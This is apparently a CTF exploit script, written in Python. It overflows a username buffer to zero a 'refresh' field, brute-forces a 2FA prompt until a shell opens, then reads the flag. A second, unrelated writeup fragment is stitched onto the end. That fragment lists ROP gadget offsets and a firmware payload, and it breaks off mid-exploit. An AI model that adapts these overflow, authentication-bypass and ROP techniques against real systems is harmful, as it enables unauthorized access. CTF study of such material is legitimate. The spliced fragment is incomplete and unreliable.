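import interact
import struct  # not used by this exploit; kept as in the original script

# Prompts the target prints; every send is synchronised on the prompt before it.
USERNAME_PROMPT = 'Enter Admin Username:'
CODE_PROMPT = 'Enter your 2FA Code:'

# Username overflow: 16 filler bytes, then 8 NUL bytes that land on the
# "refresh" field and set it to 0 (this is what makes the brute force viable).
REFRESH_ZERO_PAYLOAD = 'A' * 16 + '\x00' * 8

# Username / 2FA code pair replayed on every brute-force attempt.
ATTEMPT_USERNAME = 'A' * 8
ATTEMPT_CODE = '0' * 20


def zero_refresh(p):
    """Overflow the username field so the adjacent refresh value becomes 0.

    Waits for the username prompt, sends REFRESH_ZERO_PAYLOAD and consumes
    the 2FA prompt that follows, leaving *p* positioned for the login loop.

    Args:
        p: interactive process exposing readuntil()/sendline().
    """
    p.readuntil(USERNAME_PROMPT)
    p.sendline(REFRESH_ZERO_PAYLOAD)
    p.readuntil(CODE_PROMPT)


def brute_force_2fa(p, max_attempts=None):
    """Replay login attempts until the target reports a shell.

    Each attempt answers the username prompt with ATTEMPT_USERNAME, the 2FA
    prompt with ATTEMPT_CODE, and reads the reply up to the next '!'.

    Args:
        p: interactive process exposing readuntil()/sendline().
        max_attempts: give up after this many attempts; None means unbounded,
            which is what the original `while True` loop did.

    Returns:
        True as soon as a reply contains 'shell', False if the attempt
        budget is exhausted first.
    """
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        p.readuntil(USERNAME_PROMPT)
        p.sendline(ATTEMPT_USERNAME)
        p.readuntil(CODE_PROMPT)
        p.sendline(ATTEMPT_CODE)
        reply = p.readuntil('!')
        # NOTE(review): assumes readuntil() returns str (Python 2-era script);
        # if it returned bytes this membership test would raise TypeError.
        if 'shell' in reply:
            return True
    return False


def main():
    """Run the exploit: zero the refresh field, brute-force 2FA, read the flag."""
    p = interact.Process()
    zero_refresh(p)
    if not brute_force_2fa(p):
        raise SystemExit('2FA brute force exhausted without reaching a shell')
    p.sendline('cat flag')
    p.interactive()


if __name__ == '__main__':
    main()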
# This writeup is based off of: https://ctftime.org/writeup/11273 # Import the python libraries, and establish the target import interact import struct target = interact.Process() # Declare needed rop gadgets offsets popRdi = 0x21102 popRax = 0x33544 popRsi = 0x202e8 popRdx = 0x1b92 binsh = 0x18cd57 syscall = 0xbc375 addRsp = 0xc96a6 # A function desgined to just setup initial firmware to enable debugging def debugFirmware(): target.sendline('U') initialFirmware = "FW" + "\xa2\xc8" + "1081" + "9" initialFirmware = initialFirmware + "\x00" * (0x400 - len(initialFirmware)) target.sendline(initialFirmware) target.sendline(initialFirmware) target.sendline('E')